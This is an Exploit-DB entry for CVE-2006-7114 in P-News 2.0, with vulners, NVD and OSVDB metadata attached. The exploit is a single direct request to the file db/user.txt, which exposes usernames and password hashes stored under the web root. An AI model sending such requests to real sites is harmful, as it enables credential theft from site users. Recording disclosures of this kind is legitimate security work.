ID EDB-ID:2862
Type exploitdb
Reporter Lu7k
Modified 2006-11-28T00:00:00
Description
P-News v2 (user.txt) Remote Password Disclosure Vulnerability. CVE-2006-7114. Webapps exploit for php platform
P-News V² - (user.txt) Information Disclosure Vulnerability
**************************************************************
Critical Level : Dangerous
**************************************************************
Script Download: http://download.planerd.net/dir/php
**************************************************************
Bugfounder: Lu7k
**************************************************************
Contact Me : www.school-of-hack.de or lu7k@mail.nu
**************************************************************
-----------------------------------------------------------------------------
Code:http://target/path/db/user.txt
-----------------------------------------------------------------------------
*************************************************************
Greetings: Bdrok - TheJT - MyMaster - str0ke
*************************************************************
# milw0rm.com [2006-11-28]
{"id": "EDB-ID:2862", "hash": "1568a984d8227ee2524bae2e9df10cb4", "type": "exploitdb", "bulletinFamily": "exploit", "title": "P-News 2.0 - user.txt Remote Password Disclosure Vulnerability", "description": "P-News v2 (user.txt) Remote Password Disclosure Vulnerability. CVE-2006-7114. Webapps exploit for php platform", "published": "2006-11-28T00:00:00", "modified": "2006-11-28T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/2862/", "reporter": "Lu7k", "references": [], "cvelist": ["CVE-2006-7114"], "lastseen": "2016-01-31T17:11:53", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-7114"]}, {"type": "osvdb", "idList": ["OSVDB:30776"]}], "modified": "2016-01-31T17:11:53"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2862/", "sourceData": "P-News V\u00c2\u00b2 - (user.txt) Information Disclosure Vulnerability\r\n\r\n\r\n**************************************************************\r\nCritical Level : Dangerous\r\n**************************************************************\r\nScript Download: http://download.planerd.net/dir/php\r\n**************************************************************\r\nBugfounder: Lu7k\r\n**************************************************************\r\nContact Me : www.school-of-hack.de or lu7k@mail.nu\r\n**************************************************************\r\n\r\n-----------------------------------------------------------------------------\r\n\r\nCode:http://target/path/db/user.txt\r\n\r\n-----------------------------------------------------------------------------\r\n\r\n*************************************************************\r\nGreetings: Bdrok - TheJT - MyMaster - str0ke\r\n*************************************************************\r\n\r\n# milw0rm.com [2006-11-28]\r\n", "osvdbidlist": ["30776"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-07-29T11:21:46", "bulletinFamily": "NVD", "description": "P-News 2.0 stores db/user.txt under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes via a direct request. NOTE: this might be the same issue as CVE-2006-6888.", "modified": "2017-07-28T21:29:50", "published": "2007-03-05T20:19:00", "id": "CVE-2006-7114", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7114", "title": "CVE-2006-7114", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/path/db/user.txt\n## References:\nVendor URL: http://download.planerd.net/dir/php\n[Secunia Advisory ID:23103](https://secuniaresearch.flexerasoftware.com/advisories/23103/)\n[Related OSVDB ID: 30777](https://vulners.com/osvdb/OSVDB:30777)\nISS X-Force ID: 30578\nGeneric Exploit URL: http://milw0rm.com/exploits/2862\nFrSIRT Advisory: ADV-2006-4770\n[CVE-2006-7114](https://vulners.com/cve/CVE-2006-7114)\n", "modified": "2006-11-28T08:18:46", "published": "2006-11-28T08:18:46", "href": "https://vulners.com/osvdb/OSVDB:30776", "id": "OSVDB:30776", "title": "P-News user.txt User Database Disclosure", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}